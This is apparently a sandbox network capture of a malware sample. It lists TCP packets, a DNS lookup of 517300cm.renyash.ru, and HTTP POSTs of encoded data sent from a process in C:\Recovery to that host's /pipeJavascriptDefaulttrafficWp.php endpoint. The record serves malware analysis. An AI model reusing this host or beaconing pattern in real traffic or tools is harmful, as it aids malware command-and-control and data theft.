Jan 9, 2025 18:13:49.331319094 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.548552036 CET	80	50125	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:49.612771988 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.755414963 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.760411024 CET	80	50125	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:49.760485888 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.766319990 CET	50126	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.771131039 CET	80	50126	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:49.771199942 CET	50126	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.777858973 CET	50126	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.782614946 CET	80	50126	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.003911972 CET	50126	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.004415035 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.009248972 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.009321928 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.009423971 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.014215946 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.053297997 CET	80	50126	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.126425028 CET	80	50126	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.126471043 CET	50126	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.362382889 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.367454052 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.453035116 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:50.501605988 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:50.940092087 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.071110964 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.071297884 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.187006950 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.190498114 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.192082882 CET	80	50127	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.194586992 CET	50127	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.195317030 CET	80	50128	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.195391893 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.195530891 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.200268030 CET	80	50128	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.552732944 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:51.557563066 CET	80	50128	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.712847948 CET	80	50128	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:51.872459888 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.024873972 CET	80	50128	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.081151009 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.148281097 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.153104067 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.153167963 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.153335094 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.158082008 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.525923014 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.530812025 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.617923021 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.659102917 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.868572950 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.909095049 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.982088089 CET	50128	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.982534885 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.983175039 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.987652063 CET	80	50129	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.987728119 CET	50129	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.987926006 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:52.988089085 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.988219023 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:52.992970943 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.346752882 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.351553917 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.474709988 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.518491983 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.631685019 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.676515102 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.719014883 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.768450022 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.845294952 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.846096039 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.850320101 CET	80	50130	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.850373030 CET	50130	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.850954056 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:53.851037025 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.852533102 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:53.857256889 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.206203938 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.211055994 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.314378023 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.471725941 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.582663059 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.701983929 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.702486038 CET	50132	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.820605040 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.820796013 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.820928097 CET	80	50132	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.821152925 CET	80	50131	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:54.821156025 CET	50132	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.821247101 CET	50132	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.821274996 CET	50131	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:54.825989008 CET	80	50132	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.019105911 CET	50132	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.019764900 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.024638891 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.024738073 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.024806023 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.029551029 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.069468975 CET	80	50132	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.142611027 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.147720098 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.147893906 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.147893906 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.152719021 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.191487074 CET	80	50132	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.194761992 CET	50132	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.380573988 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.385524035 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.385617971 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.484664917 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.503406048 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.508454084 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.581053972 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.591604948 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.746006966 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.760760069 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.767771006 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.877897024 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.878025055 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.889095068 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.889350891 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.889836073 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.894089937 CET	80	50133	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.894146919 CET	50133	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.894355059 CET	80	50134	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.894408941 CET	50134	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.894659996 CET	80	50135	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:55.894718885 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.894821882 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:55.899619102 CET	80	50135	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:56.253006935 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.257900000 CET	80	50135	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:56.363181114 CET	80	50135	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:56.409079075 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.536175013 CET	80	50135	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:56.581058979 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.660007954 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.665034056 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:56.665116072 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.665204048 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:56.669986963 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.018696070 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.023685932 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.224293947 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.284208059 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.462692022 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.582632065 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.594499111 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.594511986 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.599396944 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.602597952 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.602757931 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.607522964 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.620058060 CET	80	50136	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:57.622589111 CET	50136	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.956079960 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:57.960990906 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.095144987 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.143440962 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.370287895 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.424701929 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.486201048 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.487217903 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.491476059 CET	80	50137	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.491538048 CET	50137	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.492165089 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.492221117 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.492315054 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.497267008 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.850538969 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:58.856005907 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.936728001 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:58.989500046 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.403876066 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:59.455981970 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.525417089 CET	50135	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.529495955 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.532557964 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.534686089 CET	80	50138	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:59.537415981 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:59.537516117 CET	50138	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.537612915 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.537612915 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.542454958 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:59.893513918 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:59.898386002 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.015043974 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.073580980 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.288491964 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.407502890 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.412978888 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.414021969 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.418143988 CET	80	50139	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.418201923 CET	50139	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.418962002 CET	80	50140	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.419043064 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.419193983 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.424069881 CET	80	50140	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.769623995 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.769623995 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.772514105 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.824143887 CET	80	50140	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.824201107 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.824232101 CET	80	50140	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.824302912 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.824425936 CET	50140	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.825093031 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.829938889 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.889614105 CET	50142	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.895107031 CET	80	50142	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:00.895303011 CET	50142	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.895303011 CET	50142	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:00.900324106 CET	80	50142	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.178491116 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.183895111 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.184010983 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.253534079 CET	50142	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.258908033 CET	80	50142	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.282294989 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.471684933 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.523580074 CET	80	50142	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.581100941 CET	50142	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.618835926 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.703207970 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.717123032 CET	80	50141	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.740621090 CET	80	50142	104.21.38.84	192.168.2.4
Jan 9, 2025 18:14:01.877831936 CET	50141	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:14:01.878087997 CET	50142	80	192.168.2.4	104.21.38.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 18:12:14.210041046 CET	51869	53	192.168.2.4	1.1.1.1
Jan 9, 2025 18:12:14.221810102 CET	53	51869	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 18:12:14.210041046 CET	192.168.2.4	1.1.1.1	0x1cc3	Standard query (0)	517300cm.renyash.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 18:12:14.221810102 CET	1.1.1.1	192.168.2.4	0x1cc3	No error (0)	517300cm.renyash.ru		104.21.38.84	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:12:14.221810102 CET	1.1.1.1	192.168.2.4	0x1cc3	No error (0)	517300cm.renyash.ru		172.67.220.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

517300cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:14.234020948 CET	324	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:14.582132101 CET	344	OUT	Data Raw: 00 04 04 03 03 08 04 05 05 06 02 01 02 07 01 04 00 02 05 09 02 07 03 0b 07 00 0f 01 03 02 00 08 0f 0f 06 0b 03 07 03 0a 0d 00 05 00 00 02 06 05 07 04 0c 5e 0e 00 04 07 06 04 04 56 06 06 07 0b 02 07 0d 0b 00 04 06 01 0c 50 0b 03 0c 0d 0e 07 05 57 Data Ascii: ^VPW[W\L~Ap~trz]b\tkRv]wos]\|cZ{RZXo`TDhS`w\|}e~V@A{CrN}L}
Jan 9, 2025 18:12:14.718516111 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:15.000421047 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sun5RzdOKhA5NEz%2BqtNv0BQCQgrjdS2kIxyZn6IoeM6CX2EevglotxE5MhxWyYEDRRF4la44tiOKGB6ac9Vu8CvKJg13wNi9V9Z0PemIpogXF0v4rf5FJqea59s%2B8GW5LcUGBY1W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d13b984431c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7367&min_rtt=1668&rtt_var=12025&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=30889&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 36 30 0d 0a 56 4a 7e 4e 6c 53 60 5e 6c 61 68 02 7c 4f 60 5a 6a 67 64 51 7f 5e 65 4f 7a 5d 74 4c 6a 62 59 5a 76 73 76 53 6e 62 61 4b 77 65 7f 58 7d 71 78 01 55 4b 71 41 63 62 7b 03 68 62 66 59 6b 59 71 52 6f 5f 60 0b 7d 73 7f 00 76 62 7d 05 60 4f 53 05 6b 71 76 00 7e 42 67 55 7f 77 63 00 76 66 7b 06 7c 5c 50 59 7e 60 72 5f 78 77 70 06 79 74 63 5f 6c 53 59 01 7a 5b 70 02 78 5d 7a 06 6b 60 7b 58 7b 01 7f 58 6a 5c 7b 4f 76 72 78 48 7a 51 41 5b 7c 59 52 41 6b 4f 76 51 77 6c 74 06 7a 7c 78 03 77 60 76 0c 7a 72 71 02 6a 55 6a 03 6c 58 7d 58 76 5d 5a 59 77 72 63 5d 63 72 7a 50 7e 5d 7a 06 74 72 6e 5c 76 65 52 09 7e 6f 76 5c 60 6f 77 5d 68 5d 6c 49 78 6f 64 5a 6c 59 76 02 6b 6d 7c 08 76 67 6c 07 69 62 66 09 7e 0b 6f 0a 7b 7d 7e 07 7d 62 57 07 7b 5d 46 51 6b 6c 52 0d 7d 4e 52 4f 7e 01 79 5f 7b 7d 55 44 7b 5c 6b 5c 7f 4f 73 4b 7e 77 5d 09 68 60 69 4f 6d 4d 68 4d 7e 62 70 46 74 73 69 51 7b 5c 79 44 75 48 74 07 7d 58 56 07 7d 48 69 41 74 62 7f 00 7f 72 79 4c 7d 67 7a 08 78 66 78 0a 7c 63 55 05 76 4c 7d 05 74 [TRUNCATED] Data Ascii: 560VJ~NlS`^lah\|O`ZjgdQ^eOz]tLjbYZvsvSnbaKweX}qxUKqAcb{hbfYkYqRo_`}svb}`OSkqv~BgUwcvf{\|\PY~`r_xwpytc_lSYz[px]zk`{X{Xj\{OvrxHzQA[\|YRAkOvQwltz\|xw`vzrqjUjlX}Xv]ZYwrc]crzP~]ztrn\veR~ov\`ow]h]lIxodZlYvkm\|vglibf~o{}~}bW{]FQklR}NRO~y_{}UD{\k\OsK~w]h`iOmMhM~bpFtsiQ{\yDuHt}XV}HiAtbryL}gzxfx\|cUvL}t_yJ~aj}RV}gsDuqkxrSJ}Niygl{gZxmUzb`zcT}p^{Yl~bwMua^G}Rg\|whaS@uBhLxlpKvp\yqW~B~O{OfwcwuadtOP
Jan 9, 2025 18:12:15.000438929 CET	224	IN	Data Raw: 40 7c 60 7a 07 76 72 69 4c 75 75 6c 41 7f 52 69 4d 76 7c 52 01 7f 4d 5e 07 7b 7c 55 4b 7a 70 50 4a 7f 53 5a 43 74 49 7c 4c 7d 4c 50 09 7d 53 6f 42 78 7d 72 41 7e 72 5b 40 7f 5e 64 0c 7c 6c 5a 0d 7d 70 52 41 7d 49 72 06 78 53 59 02 78 72 60 01 7f Data Ascii: @\|`zvriLuulARiMv\|RM^{\|UKzpPJSZCtI\|L}LP}SoBx}rA~r[@^d\|lZ}pRA}IrxSYxr`ac\|ww^Szc`bVKtc}B{aeuX\|\|vh}v}w\c}beIPNxvR@}]curmLvaa\|af~ll}IQJvqsxL}}N_{I\|{g^B{msHzblIx]~{]NZ{x\|bcvrlI~ooH}gtXbSvUt
Jan 9, 2025 18:12:15.000447989 CET	711	IN	Data Raw: 4e 6f 6c 60 01 60 06 62 40 7a 4f 7e 58 7d 6f 62 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 6a 05 60 4c 6d 06 61 66 74 41 7e 7c 53 4f 77 7f 74 4d 7f 4d 78 4a 7b 42 63 00 6f 5e 76 4b 7f 7e 6f 50 76 74 6b 5d 69 62 7a 41 7a 53 59 51 51 Data Ascii: Nol``b@zO~X}ob_z\yvxBagx[L~Jx^j`LmaftA~\|SOwtMMxJ{Bco^vK~oPvtk]ibzAzSYQQT[]jaFklkPQw@QlsR]yCVTYlnKd}xEj`BRAWoLT[cHZzNPrfY\uwHVe]funLZqJknz{ZDPx_sUicdYu\yvq}kXfK}BwQjY`^baVZx~[jNqIyg^]y]J\ldGTqMo[Cjs_Ukc_Pg^w\\|R
Jan 9, 2025 18:12:15.095347881 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 9, 2025 18:12:15.842602968 CET	300	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 384 Expect: 100-continue
Jan 9, 2025 18:12:15.940282106 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:15.940675974 CET	384	OUT	Data Raw: 55 55 5b 54 58 44 55 5f 59 58 51 54 5b 57 57 53 5f 57 58 55 52 59 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[TXDU_YXQT[WWS_WXURYZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#=#<>_=3?Z-+4 &;>'6=W$3%S%'X#Y8?'\"/Y.(
